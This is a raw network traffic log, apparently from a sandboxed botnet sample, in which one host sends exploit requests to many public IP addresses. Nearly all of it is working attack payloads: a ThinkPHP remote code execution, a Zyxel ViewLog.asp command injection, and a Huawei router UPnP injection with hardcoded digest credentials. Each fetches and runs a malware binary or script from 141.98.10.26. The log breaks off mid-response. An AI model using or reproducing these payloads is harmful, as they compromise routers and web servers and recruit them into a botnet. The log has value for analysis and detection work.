Nov 22, 2023 08:40:05.098720074 CET	16386	IN	HTTP/1.1 400 Bad Request Server: nginx/1.19.0 Date: Wed, 22 Nov 2023 07:39:15 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.19.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
804	192.168.2.23	39292	95.101.43.190	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:04.893645048 CET	16376	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:05.130441904 CET	16388	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 22 Nov 2023 07:40:04 GMT Date: Wed, 22 Nov 2023 07:40:04 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 62 63 39 31 30 30 32 26 23 34 36 3b 31 37 30 30 36 33 38 38 30 34 26 23 34 36 3b 36 31 30 36 61 63 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.9bc91002.1700638804.6106ac8</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
805	192.168.2.23	33456	85.122.212.156	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:04.902151108 CET	16378	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
806	192.168.2.23	40164	31.214.140.191	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:04.977473021 CET	16381	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
807	192.168.2.23	57784	94.122.29.34	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:04.991309881 CET	16381	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
808	192.168.2.23	44356	94.121.126.75	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:04.998220921 CET	16382	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
809	192.168.2.23	46652	95.85.185.234	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:05.270962000 CET	16461	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
810	192.168.2.23	39704	31.200.102.14	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:05.797496080 CET	16494	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
811	192.168.2.23	39244	31.136.230.194	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:05.980899096 CET	16505	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:06.560874939 CET	16543	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:07.680573940 CET	16654	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:09.984235048 CET	16971	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:14.591618061 CET	17524	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:23.550384998 CET	18588	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:41.723839998 CET	19764	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:41:18.582746983 CET	19786	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
812	192.168.2.23	43998	95.85.110.220	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:06.749263048 CET	16545	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:07.013703108 CET	16561	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:40:06 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
813	192.168.2.23	50180	95.82.53.47	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:06.827419043 CET	16556	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:08.544500113 CET	16766	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:10.752176046 CET	17098	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:14.847672939 CET	17588	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:23.038404942 CET	18539	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:39.676178932 CET	19763	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:41:12.439570904 CET	19784	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
814	192.168.2.23	59478	88.99.93.22	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:06.938090086 CET	16560	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:07.127311945 CET	16563	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:40:07 GMT Content-Type: text/html Content-Length: 150 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
815	192.168.2.23	48840	88.255.41.17	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:06.977798939 CET	16560	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:15.228844881 CET	17603	IN	HTTP/1.1 504 Gateway Timeout Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
816	192.168.2.23	33446	41.42.152.140	37215

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:09.100084066 CET	16781	OUT	POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: / Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669" Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.26 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Nov 22, 2023 08:40:09.366004944 CET	16852	IN	HTTP/1.1 500 Internal Server Error Content-Type: text/xml; charset="utf-8" Server: Linux UPnP/1.0 Huawei-ATP-IGD EXT: Connection: Keep-Alive Content-Length: 398

Session ID	Source IP	Source Port	Destination IP	Destination Port
817	192.168.2.23	44258	94.120.159.108	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:09.458992004 CET	16940	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
818	192.168.2.23	33074	94.123.177.249	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:09.459049940 CET	16940	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
819	192.168.2.23	43982	31.44.141.62	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:09.459089041 CET	16941	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
820	192.168.2.23	52558	112.125.237.78	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:09.539594889 CET	16952	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:09.858716011 CET	16965	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:37:15 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 